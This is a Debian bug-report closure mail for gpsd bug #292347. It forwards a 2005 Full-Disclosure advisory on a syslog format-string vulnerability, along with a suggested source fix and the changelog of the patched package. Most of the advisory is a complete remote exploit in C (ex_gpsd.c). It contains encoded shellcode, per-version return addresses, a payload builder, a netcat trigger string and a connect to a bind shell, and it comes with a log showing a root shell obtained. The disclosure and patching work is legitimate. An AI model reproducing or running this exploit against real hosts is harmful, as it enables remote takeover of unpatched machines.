Your message dated Thu, 27 Jan 2005 09:17:13 -0500
with message-id <[EMAIL PROTECTED]>
and subject line Bug#292347: fixed in gpsd 2.7-4
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere. Please contact me immediately.)
Debian bug tracking system administrator
(administrator, Debian Bugs database)
--------------------------------------
Received: (at submit) by bugs.debian.org; 26 Jan 2005 16:40:14 +0000
>From [EMAIL PROTECTED] Wed Jan 26 08:40:14 2005
Return-path: <[EMAIL PROTECTED]>
Received: from mail.cfm.ohio-state.edu [128.146.87.4]
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1CtqDF-0001yA-00; Wed, 26 Jan 2005 08:40:13 -0800
Received: from localhost (mail.cfm.ohio-state.edu [127.0.0.1])
by mail.cfm.ohio-state.edu (Postfix) with ESMTP id C419D1680D8
for <[EMAIL PROTECTED]>; Wed, 26 Jan 2005 11:30:49 -0500 (EST)
Received: from mail.cfm.ohio-state.edu ([127.0.0.1])
by localhost (mail.cfm.ohio-state.edu [127.0.0.1]) (amavisd-new, port
10024)
with ESMTP id 04249-10 for <[EMAIL PROTECTED]>;
Wed, 26 Jan 2005 11:30:49 -0500 (EST)
Received: from [192.168.0.105] (ivory.cfm.ohio-state.edu [128.146.87.149])
by mail.cfm.ohio-state.edu (Postfix) with ESMTP id 773C216803D
for <[EMAIL PROTECTED]>; Wed, 26 Jan 2005 11:30:49 -0500 (EST)
Message-ID: <[EMAIL PROTECTED]>
Date: Wed, 26 Jan 2005 11:38:55 -0500
From: "KF (lists)" <[EMAIL PROTECTED]>
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.3) Gecko/20041007
Debian/1.7.3-5
X-Accept-Language: en
MIME-Version: 1.0
To: [EMAIL PROTECTED]
Subject: debian unstable / testing gpsd bug
Content-Type: multipart/mixed;
boundary="------------060700030808030006070503"
X-Virus-Scanned: by amavisd-new-20030616-p9 at cfm.ohio-state.edu
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-5.3 required=4.0 tests=BAYES_00,HAS_PACKAGE,
LARGE_HEX,MAILTO_WITH_SUBJ autolearn=no
version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level:
This is a multi-part message in MIME format.
--------------060700030808030006070503
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Package: gpsd
Version: 2.7-1
Severity: grave
Tags: security sarge sid
)
Let me know if you guys need anything further.
--------------060700030808030006070503
Content-Type: message/rfc822;
name="[Full-Disclosure] DMA[2005-0125a] - 'berlios gpsd format string
vulnerability'"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="[Full-Disclosure] DMA[2005-0125a] - 'berlios gpsd format string
vulnerability'"
Return-path: <[EMAIL PROTECTED]>
Envelope-to: [EMAIL PROTECTED]
Delivery-date: Wed, 26 Jan 2005 11:36:13 +0000
Received: from [195.74.102.171] (helo=node-telf01.spamstomp.net)
by nemesis.shopperlabs.com with esmtp (Exim 4.34)
id 1CtlT3-0007BP-2b
for [EMAIL PROTECTED]; Wed, 26 Jan 2005 11:36:13 +0000
Received: from spamstomp by node-telf01.spamstomp.net with whitelist-ok (Exim
4.43)
id 1Ctljp-0005e6-64
for [EMAIL PROTECTED]; Wed, 26 Jan 2005 11:53:33 +0000
Received: from [199.201.233.253] (helo=lists.netsys.com)
by node-telf01.spamstomp.net with esmtp (Exim 4.43)
id 1Ctljj-0005ai-NL
for [EMAIL PROTECTED]; Wed, 26 Jan 2005 11:53:32 +0000
Received: from lists (localhost [127.0.0.1])
by lists.netsys.com (8.12.10+Sun/8.12.10) with ESMTP id j0QAq7AG023588;
Wed, 26 Jan 2005 05:52:37 -0500 (EST)
Received: from mail.cfm.ohio-state.edu (mail.cfm.ohio-state.edu [128.146.87.4])
by lists.netsys.com (8.12.10+Sun/8.12.10) with ESMTP id j0Q58Irs025067
for <[email protected]>;
Wed, 26 Jan 2005 00:08:18 -0500 (EST)
Received: from localhost (mail.cfm.ohio-state.edu [127.0.0.1])
by mail.cfm.ohio-state.edu (Postfix) with ESMTP
id B51991680D6; Tue, 25 Jan 2005 23:58:59 -0500 (EST)
Received: from mail.cfm.ohio-state.edu ([127.0.0.1])
by localhost (mail.cfm.ohio-state.edu [127.0.0.1]) (amavisd-new,
port 10024)
with ESMTP id 26835-06; Tue, 25 Jan 2005 23:58:59 -0500 (EST)
Received: from [192.168.1.201] (cpe-024-033-230-145.insight.rr.com
[24.33.230.145]) by mail.cfm.ohio-state.edu (Postfix) with ESMTP
id 7CE7D16803D; Tue, 25 Jan 2005 23:58:58 -0500 (EST)
Message-ID: <[EMAIL PROTECTED]>
Date: Wed, 26 Jan 2005 00:08:16 -0500
From: "KF (Lists)" <[EMAIL PROTECTED]>
User-Agent: Mozilla Thunderbird 0.9 (X11/20041124)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: undisclosed-recipients: ;
X-Enigmail-Version: 0.89.0.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: multipart/mixed; boundary="------------030802080707090409000903"
X-Virus-Scanned: by amavisd-new-20030616-p9 at cfm.ohio-state.edu
X-Mailman-Approved-At: Wed, 26 Jan 2005 05:51:44 -0500
Subject: [Full-Disclosure] DMA[2005-0125a] - 'berlios gpsd format string
vulnerability'
X-BeenThere: [email protected]
X-Mailman-Version: 2.1.5
Precedence: list
List-Id: Discussion of security issues <full-disclosure.lists.netsys.com>
List-Unsubscribe: <https://lists.netsys.com/mailman/listinfo/full-disclosure>,
<mailto:[EMAIL PROTECTED]>
List-Archive: <http://lists.netsys.com/pipermail/full-disclosure>
List-Post: <mailto:[email protected]>
List-Help: <mailto:[EMAIL PROTECTED]>
List-Subscribe: <https://lists.netsys.com/mailman/listinfo/full-disclosure>,
<mailto:[EMAIL PROTECTED]>
Sender: [EMAIL PROTECTED]
Errors-To: [EMAIL PROTECTED]
This is a multi-part message in MIME format.
--------------030802080707090409000903
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
--------------030802080707090409000903
Content-Type: text/plain;
name="DMA[2005-0125a].txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="DMA[2005-0125a].txt"
DMA[2005-0125a] - 'berlios gpsd (remake of pygps) format string vulnerability'
Author: Kevin Finisterre
Vendor: http://gpsd.berlios.de, http://www.pygps.org
Product: 'gpsd'
References: http://www.digitalmunition.com/DMA[2005-0125a].txt
Description:
gpsd is a service daemon that monitors a GPS attached to a host computer
through
a serial or USB port. The GPS data from the device which includes location,
course,
velocity is available to be queried on TCP port 2947. With gpsd, multiple GPS
client
applications (such as navigational and wardriving software) can share access to
a
GPS without contention or loss of data.
Who would use gpsd? GIS Projets, Remote Sensing Projects, Wardrivers (Kismet
users),
Cartography Groups, Hydrology Projects, Land Management, Forrestry, etc.
Gpsd moved from www.pygps.org in August 2004 and gpsd has just undergone a
major
rewrite at the hands of Eric S. Raymond, author of fetchmail and several books
about
unix. http://www.catb.org/~esr/graphics/esr001.jpg
This bug appears to have been recently introduced into the codebase, possibly
by
~esr? The vulnerability was introduced somewhere between gpsd-1.10.tar.gz
13-Oct-2003
and gpsd-1.90.tar.gz 19-Aug-2004. The last 2 names in the changelog are Derrick
J. Brashear, 2 January 2000 and Eric S. Raymond, 23 Aug 2004.
Vulnerable versions of gpsd can be found at:
http://developer.berlios.de/project/showfiles.php?group_id=2116
Known vulnerable versions include gpsd-1.9.0 through gpsd-2.7.
The format string issue is in the gpsd_report() funciton. syslog() is used
without a
format specifier multiple times in gpsd.c.
./gpsd.c: syslog(LOG_ERR, buf);
./gpsd.c: syslog(LOG_NOTICE, buf);
and more recently
./gpsd.c: syslog((errlevel == 0) ? LOG_ERR : LOG_NOTICE, buf);
There are very few gpsd_report() calls that contain "%s" and only one is an
exploitable
instance.
./gpsd.c: gpsd_report(1, "<= client: %s", buf);
Here is a sample run at triggering the vulnerability.
[EMAIL PROTECTED] gpsd-2.0]# /usr/sbin/gpsd -p /dev/ttyS0
[EMAIL PROTECTED] gpsd-2.0]# tail -f /var/log/messages
Sep 19 12:59:23 threat gpsd[9420]: gpsd: launching (Version 2.0)
Sep 19 12:59:23 threat gpsd[9420]: gpsd: listening on port 2947
[EMAIL PROTECTED] gpsd-2.0]# nc localhost 2947
AAAABBBB%x%x%x%x%x%x%x%x%x%x%x%x%x
GPSD,A=?,A=?,A=?,A=?,X=1,X=1,X=1,X=1,X=1,X=1,X=1,X=1,X=1,X=1,X=1,X=1,X=1
The above netcat session generated the following Syslog messages.
Sep 19 13:00:08 threat gpsd[9420]: gpsd: closed GPS
Sep 19 13:00:08 threat gpsd[9420]: gpsd: opening GPS data source at /dev/ttyS0
Sep 19 13:00:08 threat gpsd[9420]: gpsd: setting speed 4800, 8 bits, no parity
Sep 19 13:00:08 threat gpsd[9420]: gpsd: gpsd_activate: opened GPS (6)
Sep 19 13:00:08 threat gpsd[9420]: gpsd: <= client:
AAAABBBBfefdf8f80647370673d3c203a696c63203a746e654141412042424241257825422578
2578257825782578257825782578
Sep 19 13:00:11 threat gpsd[9420]: gpsd: closed GPS
>From here you are dealing with a classic format string exploit.
Successful exploitation on a redhat box gets you root, and on Debian you get
uid=gpsd gid=dialout.
jdam:/home/kfinisterre/gps$ ./ex_gpsd -h 192.168.1.203 -t 12
# remote host 192.168.1.203.
Checking Remote version
GPSD VERSION: 2.6
# send exploit data.
[*] data sent 3389 bytes .
[*] data sent 2 bytes .
[+] Trying to exec shellcode on remote
[*] data sent 2 bytes .
[-] Waiting 5 seconds to connect to remote shell
[+] yes!
[*] Executed shell successfully !
Linux localhost.localdomain 2.4.20-8 #1 Thu Mar 13 17:18:24 EST 2003 i686
athlon i386 GNU/Linux
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
stty: standard input: Invalid argument
[EMAIL PROTECTED] /]# exit
To fix this vulnerability in ./gpsd.c you need to modify a few syslog calls.
This
may break existing gpsd_report() functionality. When the author(s) gets around
to
checking email and or reading the bug entries a new version will come out. This
work
around is strictly to prevent exploitation.
syslog(LOG_ERR, "%s", buf);
syslog(LOG_NOTICE, "%s", buf);
syslog((errlevel == 0) ? LOG_ERR : LOG_NOTICE, "%s", buf);
Timeline associated with this bug:
01/19/2005 attempts to notify all of the individuals working on the project via
email were made.
no response.
01/20/2005 BerliOS Developer bug ID #003087 Security Vulnerability ala
syslog() was filed.
no response.
-KF
--------------030802080707090409000903
Content-Type: text/x-csrc;
name="ex_gpsd.c"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="ex_gpsd.c"
/**
** Copyright Johnh and KF 2005
**
** Gpsd remote format string exploit
** By: Johnh[at]digitalmunition[dot]com
** Bug Found By: kf[at]digitalmunition[dot]com
** http://www.digitalmunition.com/DMA[2005-0125a].txt
**
** Features: Version ident
**
** Debian machines provide uid=gpsd
** Redhat machines provide uid=root
**
** Lots of JUMP_SLOT's provided but
** You can get or brute the shellcode
** addresses yourself.
**/
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <assert.h>
#include <fcntl.h>
#include <sys/time.h>
#define GPSD_PORT 2947
void sh(int st_sock_va);
int new_tcpConnect (char *host, unsigned int port, unsigned int timeout);
int checkZero (long value);
char *putLong (char* ptr, long value);
int own_gpsd(int sock,int iType);
int check_version(int sock);
int exec_shellcode(int sock);
int usage(char *p);
struct
{
unsigned long retloc; /* retloc of syslog */
unsigned long retaddr;
char *szDescription;
}targets[] =
{
// Brute the rest of the addresses your self...
// syslog() , shellcode , version
{0x0804f250,0x41424344, "gpsd-1.91-1.i386.rpm"}, // .rpms Tested on
Redhat 9.0
{0x0804f630,0x41424344, "gpsd-1.92-1.i386.rpm"},
{0x0804e154,0x41424344, "gpsd-1.93-1.i386.rpm"},
{0x0804f260,0x41424344, "gpsd-1.94-1.i386.rpm"},
{0x0804f268,0x41424344, "gpsd-1.95-1.i386.rpm"},
{0x41424344,0x41424344, "gpsd-1.96-1.i386.rpm"}, //broken rpm?
{0x0804b14c,0x41424344, "gpsd-1.97-1.i386.rpm"},
{0x0804c7a0,0x41424344, "gpsd-2.1-1.i386.rpm"},
{0x0804c7a0,0x41424344, "gpsd-2.2-1.i386.rpm"},
{0x0804c730,0xbfffd661, "gpsd-2.3-1.i386.rpm"},
{0x0804c7b8,0xbfffde71, "gpsd-2.4-1.i386.rpm"},
{0x0804c7dc,0xbfffdc09, "gpsd-2.5-1.i386.rpm"},
{0x0804c730,0xbffff100, "gpsd-2.6-1.i386.rpm"},
{0x0804c5bc,0xbfffcabc, "gpsd-2.7-1.i386.rpm"},
{0x0804c7c4,0xbfffedc8, "gpsd_2.6-1_i386.deb"}, // .debs Tested on
Debian GNU/Linux 3.1
{0x0804c6c4,0xbfffc818, "gpsd_2.7-1_i386.deb"},
{0x0804c770,0xbfffee70, "gpsd_2.7-2_i386.deb"},
{0x0804c818,0xbfffe148, "SuSE 9.1 compiled 2.0"}, //compiled binary on
local box for debug
{0x0804b164,0xbfffd7d6, "Slackware 9.0 compiled 2.0"
{0x0804c3ec,0xbfffe65c, "Slackware 9.0 compiled 2.7 "},
{0x41424344,0xdeadbeef, "Debug "},
},v;
int iType;
char shellcode[]=
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x16\x81\x73\x17\x13\x99"
"\x37\xe2\x83\xeb\xfc\xe2\xf4\x22\x42\xc0\x01\xa3\xff\x64\xa1\x40"
"\xda\x64\x6b\xf2\xd2\xfa\x62\x9a\x5e\x65\x84\x7b\x8c\xf5\xa1\x75"
"\xca\xbe\x03\xa3\x89\x67\xb3\x44\x10\xd6\x52\x75\x54\xb7\x52\x75"
"\x2a\x33\x2f\x93\xc9\x67\xb5\x9a\x78\x74\x52\x75\x54\xb7\x6b\xca"
"\x10\xf4\x52\x2c\xd0\xfa\x62\x52\x7b\xcf\xb3\x7b\xf7\x18\x91\x7b"
"\xf1\x18\xcd\x71\xf0\xbe\x01\x42\xca\xbe\x03\xa3\x92\xfa\x62";
//thanks sam
int new_tcpConnect (char *host, unsigned int port, unsigned int timeout)
{
int sock,
flag,
pe = 0;
size_t pe_len;
struct timeval tv;
struct sockaddr_in addr;
struct hostent* hp = NULL;
fd_set rset;
// reslov hosts
hp = gethostbyname (host);
if (NULL == hp) {
perror ("tcpConnect:gethostbyname\n");
return -1;
}
sock = socket (AF_INET, SOCK_STREAM, 0);
if (-1 == sock) {
perror ("tcpConnect:socket\n");
return -1;
}
addr.sin_addr = *(struct in_addr *) hp->h_addr;
addr.sin_family = AF_INET;
addr.sin_port = htons (port);
/* set socket no block
*/
flag = fcntl (sock, F_GETFL);
if (-1 == flag) {
perror ("tcpConnect:fcntl\n");
close (sock);
return -1;
}
flag |= O_NONBLOCK;
if (fcntl (sock, F_SETFL, flag) < 0) {
perror ("tcpConnect:fcntl\n");
close (sock);
return -1;
}
if (connect (sock, (const struct sockaddr *) &addr,
sizeof(addr)) < 0 &&
errno != EINPROGRESS) {
perror ("tcpConnect:connect\n");
close (sock);
return -1;
}
/* set connect timeout
* use millisecond
*/
tv.tv_sec = timeout/1000;
tv.tv_usec = timeout%1000;
FD_ZERO (&rset);
FD_SET (sock, &rset);
if (select (sock+1, &rset, &rset, NULL, &tv) <= 0) {
// perror ("tcpConnect:select");
close (sock);
return -1;
}
pe_len = sizeof (pe);
if (getsockopt (sock, SOL_SOCKET, SO_ERROR, &pe, &pe_len) < 0) {
perror ("tcpConnect:getsockopt\n");
close (sock);
return -1;
}
if (pe != 0) {
errno = pe;
close (sock);
return -1;
}
if (fcntl(sock, F_SETFL, flag&~O_NONBLOCK) < 0) {
perror ("tcpConnect:fcntl\n");
close (sock);
return -1;
}
pe = 1;
pe_len = sizeof (pe);
if (setsockopt (sock, IPPROTO_TCP, TCP_NODELAY, &pe, pe_len) < 0){
perror ("tcpConnect:setsockopt\n");
close (sock);
return -1;
}
return sock;
}
void sh(int st_sock_va)
{
int died;
char *command="uname -a; id; export TERM=vt100; exec bash -i\n";
char readbuf[1024];
fd_set rset;
memset((char *)readbuf,0,sizeof(readbuf));
fprintf(stdout,"[*] Executed shell successfully !\n\n");
send(st_sock_va,command,strlen(command),0);
for(;;)
{
fflush(stdout);
FD_ZERO(&rset);
FD_SET(st_sock_va,&rset);
FD_SET(STDIN_FILENO,&rset);
select(st_sock_va+1,&rset,NULL,NULL,NULL);
if(FD_ISSET(st_sock_va,&rset))
{
died=read(st_sock_va,readbuf,sizeof(readbuf)-1);
if(died<=0)
exit(0);
readbuf[died]=0;
fprintf(stdout,"%s",readbuf);
}
if(FD_ISSET(STDIN_FILENO,&rset))
{
died=read(STDIN_FILENO,readbuf,sizeof(readbuf)-1);
if(died>0)
{
readbuf[died]=0;
write(st_sock_va,readbuf,died);
}
}
}
return;
}
/*
*check the \x00 byte
*/
int checkZero (long value)
{
return !((value & 0x00ffffff) &&
(value & 0xff00ffff) &&
(value & 0xffff00ff) &&
(value & 0xffffff00));
}
/*
* put a address in mem, for little-endian
*
*/
char*
putLong (char* ptr, long value)
{
*ptr++ = (char) (value >> 0) & 0xff;
*ptr++ = (char) (value >> 8) & 0xff;
*ptr++ = (char) (value >> 16) & 0xff;
*ptr++ = (char) (value >> 24) & 0xff;
return ptr;
}
int main (int argc, char **argv)
{
int c, sock, ret;
char *hostName = NULL;
if (argc < 3) {
usage (argv[0]);
return -1;
}
while((c = getopt(argc, argv, "h:t:")) != EOF) {
switch(c) {
case 'h':
hostName = optarg;
break;
case 't':
iType = atoi (optarg);
break;
default:
usage (argv[0]);
return 0;
}
}
if (argc < 2) { usage(argv[0]); exit(1); }
if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
{
usage(argv[0]);
printf("[-] Invalid type.\n");
return 0;
}
printf ("# remote host %s. \n", hostName);
sock = new_tcpConnect (hostName, GPSD_PORT, 9000);
printf("Checking Remote version\n");
check_version(sock);
own_gpsd (sock,iType);
close(sock);
sock = new_tcpConnect (hostName, GPSD_PORT, 9000);
printf("[+] Trying to exec shellcode on remote\n");
exec_shellcode(sock);
printf("[-] Waiting 5 seconds to connect to remote shell\n");
sleep (5);
if ((ret = new_tcpConnect (hostName, 5570, 9000)) < 0) {
fprintf (stderr, "[-] failed :< \n");
goto out;
}
printf ("[+] yes! \n");
sh (ret);
out:
close (ret);
return 0;
}
int own_gpsd(int sock,int iType)
{
int offset = 0x11;
int dump_fmt=7;
int al = 3;
int hi,lo;
int x;
int ret;
unsigned long shift0,shift1;
char buf[90000];
char fun[256];
char *ptr;
/* check zero byte */
if (checkZero (targets[iType].retloc) || checkZero
(targets[iType].retloc+2) ) {
printf ("retloc has a null; <\n");
exit (1);
}
hi = (targets[iType].retaddr >> 0) & 0xffff;
lo = (targets[iType].retaddr >> 16) & 0xffff;
shift0 = hi - offset - (dump_fmt * 8 + 16 + al);
shift1 = (0x10000 + lo) - hi;
memset(buf,0x41,3);
ptr = buf+3;
ptr = putLong (ptr, 0x42424242);
ptr = putLong (ptr, targets[iType].retloc);
ptr = putLong (ptr, 0x42424242);
ptr = putLong (ptr, targets[iType].retloc+2);
for (x=0;x<dump_fmt;x++)
strcat(ptr,"%.8x");
strcat(ptr,"%.");
sprintf(ptr+strlen(ptr),"%u",shift0);
strcat(ptr,"lx%hn");
strcat(ptr,"%.");
sprintf(ptr+strlen(ptr),"%u",shift1);
strcat(ptr,"lx%hn");
x = strlen(ptr);
memset(ptr+x,0x90,3000);
x+=3000;
memcpy(ptr+x,shellcode,337);
x+=337;
printf ("# send exploit data. \n");
sleep(1);
ret = send (sock, buf, x, 0);
printf ("[*] data sent %d bytes .\n", x);
memcpy(fun,"l\n",2);
ret = send (sock, fun, 2, 0);
printf ("[*] data sent %d bytes .\n", ret);
return 0;
}
//Had to connect to remote and send a string to make shellcode execute. No idea
why. but it works so :)
int exec_shellcode(int sock) {
int ret;
char fun[256];
memcpy(fun,"l\n",2);
ret = send (sock, fun, 2, 0);
printf ("[*] data sent %d bytes .\n", ret);
return 0;
}
//Check remote version of gpsd. You may ask why because all verions are vuln
but who knows :)
//When the vendor changes the code you can change this to detect a vuln/non
vuln version
int check_version(int sock) {
char *version;
char buf_ver[256];
char recv_buf[256];
int ret;
memcpy(buf_ver,"l\n",2);
ret = send (sock, buf_ver, 2, 0);
ret = recv(sock,recv_buf,sizeof(recv_buf),0);
version = strtok(recv_buf," ");
version = strtok(NULL," ");
printf("GPSD VERSION: %s\n",version);
}
int usage(char *p)
{
int i;
printf( "Gpsd <= 2.7 remote formatstring exploit\r\nBy: [EMAIL PROTECTED]");
printf( "Usage: %s <-h host> <-t target>\n"
"[type]\t[Description]\t\t\t[Retloc]\n", p);
for(i=0;i<sizeof(targets)/sizeof(v);i++)
{
printf("%d\t%s\t\t0x%08lx\n", i,
targets[i].szDescription,targets[i].retloc);
}
return 0;
}
--------------030802080707090409000903
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
--------------030802080707090409000903--
--------------060700030808030006070503--
---------------------------------------
Received: (at 292347-close) by bugs.debian.org; 27 Jan 2005 14:23:04 +0000
>From [EMAIL PROTECTED] Thu Jan 27 06:23:04 2005
Return-path: <[EMAIL PROTECTED]>
Received: from newraff.debian.org [208.185.25.31] (mail)
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1CuAY4-0008VD-00; Thu, 27 Jan 2005 06:23:04 -0800
Received: from katie by newraff.debian.org with local (Exim 3.35 1 (Debian))
id 1CuASP-0001Wj-00; Thu, 27 Jan 2005 09:17:13 -0500
From: Tilman Koschnick <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.55 $
Subject: Bug#292347: fixed in gpsd 2.7-4
Message-Id: <[EMAIL PROTECTED]>
Sender: Archive Administrator <[EMAIL PROTECTED]>
Date: Thu, 27 Jan 2005 09:17:13 -0500
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level:
Source: gpsd
Source-Version: 2.7-4
We believe that the bug you reported is fixed in the latest version of
gpsd, which is due to be installed in the Debian FTP archive:
gpsd-clients_2.7-4_i386.deb
to pool/main/g/gpsd/gpsd-clients_2.7-4_i386.deb
gpsd_2.7-4.diff.gz
to pool/main/g/gpsd/gpsd_2.7-4.diff.gz
gpsd_2.7-4.dsc
to pool/main/g/gpsd/gpsd_2.7-4.dsc
gpsd_2.7-4_i386.deb
to pool/main/g/gpsd/gpsd_2.7-4_i386.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Tilman Koschnick <[EMAIL PROTECTED]> (supplier of updated gpsd package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.7
Date: Thu, 27 Jan 2005 13:31:03 +0100
Source: gpsd
Binary: gpsd gpsd-clients
Architecture: source i386
Version: 2.7-4
Distribution: unstable
Urgency: high
Maintainer: Tilman Koschnick <[EMAIL PROTECTED]>
Changed-By: Tilman Koschnick <[EMAIL PROTECTED]>
Description:
gpsd - GPS (Global Positioning System) service daemon
gpsd-clients - clients for the GPS service daemon
Closes: 292347 292370
Changes:
gpsd (2.7-4) unstable; urgency=high
.
* setting urgency=high because of RC bugfix
* bugfix: remote security problem with format strings
- add debian/patches/09_syslog_formatstring.dpatch
- thanks to Ulf Harnhammar, KF, Petter Reinholdtsen
(closes: #292347, #292370)
* fix lintian warnings
- change description of gpsd-clients
- add /usr/share/lintian/overrides/gpsd
(ignoring non-dev-pkg-with-shlib-symlink,
description-synopsis-starts-with-a-capital-letter)
Files:
0872be11bc3a8eadc831d71604f413f4 673 misc optional gpsd_2.7-4.dsc
a889c560a24cf6269834461c64e9c476 22493 misc optional gpsd_2.7-4.diff.gz
6c4ee7e643a8a71e61fec2ecb5037219 70142 misc optional gpsd_2.7-4_i386.deb
88a2eb535ae935f264342be66b61c4d6 24754 misc optional
gpsd-clients_2.7-4_i386.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)
iD8DBQFB+POu20zMSyow1ykRApmHAKDWVdyTOc7W9omqs+/CVhfy2370QwCdG/fs
syHtdq73b7aYaGmRtN09ki0=
=No/h
-----END PGP SIGNATURE-----
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
